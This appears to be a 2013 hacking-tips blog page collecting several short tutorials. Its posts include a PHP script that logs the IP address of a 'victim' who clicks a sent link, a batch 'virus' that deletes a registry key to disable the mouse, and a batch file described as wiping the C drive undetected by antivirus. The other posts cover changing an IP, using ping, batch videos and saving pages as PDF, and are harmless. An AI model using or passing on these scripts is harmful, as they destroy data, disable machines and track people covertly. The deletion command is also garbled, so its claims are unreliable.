Tuesday, 5 November 2013

How to grab someone IP address ?

How to grab someone IP address ?



                    In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Do ?

    1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>

          2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
          3. Now Upload Grab.php to your web hosting site.
          4. Copy the link of your  uploaded file and send it to victim.
          5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
          6. Enjoy you are Done !!

      Read more »

      Learn Batch Programming (Video tutorials)

      Learn Batch Programming (Video tutorials)


               
                       Batch File programming is really really easy then any other programming language. You could do cool stuffs with batch file. I had previously posted about Matrix effect and Mouse virus which are created using batch file programming. I came across batch file programming videos on youtube so i am sharing with you all. It will hardly take your 30 minutes and you will learn a new language. This are 3 begineers videos if you like it i will find more for you guys. So lets get started learning batch programming.

      Introduction To Batch Files




      Part 1


      <iframe width="640" height="360" src="//www.youtube.com/embed/U7oayuktIJQ?feature=player_embedded" frameborder="0" allowfullscreen></iframe>

      Part 2



      <iframe width="640" height="360" src="//www.youtube.com/embed/U7oayuktIJQ?feature=player_embedded" frameborder="0" allowfullscreen></iframe>
      Read more »

      Change your Ip in less then 1 minute

      Change your Ip in less then 1 minute


         
                           In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.

      • Click on "Start" in the bottom left corner of the screen.
      • Click on "RUN"
      • Type in "command" and click OK

            You should be now at MSDOS prompt Screen
      • Type "ipconfig /release" just like that, and press "enter"
      • Type "exit" and leave the prompt
      • Right-click on "Network Places" or "My Network Places" on your desktop.
      • Click on "properties"

           Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.
      •  Right click on "Local Area Connection" and click "properties"
      • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
      • Click on "Use the following IP address" under the "General" tab
      • Create an IP address (It doesn't matter what it is)
      • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
      • Press the "Ok" button here
      • Hit the "Ok" button again

           Now you should be back to the "Local Area Connection" screen.
      • Right-click back on "Local Area Connection" and go to properties again.
      • Go back to the "TCP/IP" settings
      • This time, select "Obtain an IP address automatically"
      • Click on "Ok"
      • Hit "Ok" again.
      • Now you have a New IP address.

      Read more »

      Finding Ip Address Of A Website Using Command Prompt Or CMD

      Finding Ip Address Of A Website Using Command Prompt Or CMD


      In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

      How to find IP ?

      1. Go to Start > Type CMD and press Enter.
      2. Now write Ping followed by website URL whose IP you want to find.
      finding ip adddress of website

      3. It will take less then a second and come up with the results as shown below.
      finding ip adddress of website

      In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

      Read more »

      Make A Virus That Disable Mouse

      Make A Virus That Disable Mouse



                     I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouseso think before trying it on yourself.

      • Open Notepad and copy below codes
      rem ---------------------------------
      rem Disable Mouse
      set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
      reg delete %key%
      reg add %key% /v Start /t REG_DWORD /d 4
      rem ---------------------------------
      • Save this file as  virus.bat
      • Done you just created your virus.
      Read more »

      Learn To Make Dangerous Virus In A Minute

      Learn To Make Dangerous Virus In A Minute



      In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

      What will this virus do ?  

      You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

      How to Make the virus ?

         1. Open Notepad and copy below code into it.

      @Echo off
      Del C:\ *.* |y

         2. Save this file as virus.bat (Name can be anything but .bat is must)
         3. Now, running this file will delete all the content of C Drive.


      Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

      Read more »

      Simple Trick To Convert A Webpage To PDF File

      Simple Trick To Convert A Webpage To PDF File



      webpage as pdf

      In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.

      How To Save Web Page To PDF File ?

      1. Open the Google Chrome Browser on your PC or MAC 
      2. Then go to the web page that you want to convert as a PDF. 
      3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 
      4. Now Change the destination to “Save As PDF” and hit the save button.
      5. The current web page will instantly be downloaded as a PDF document. 

      Read more »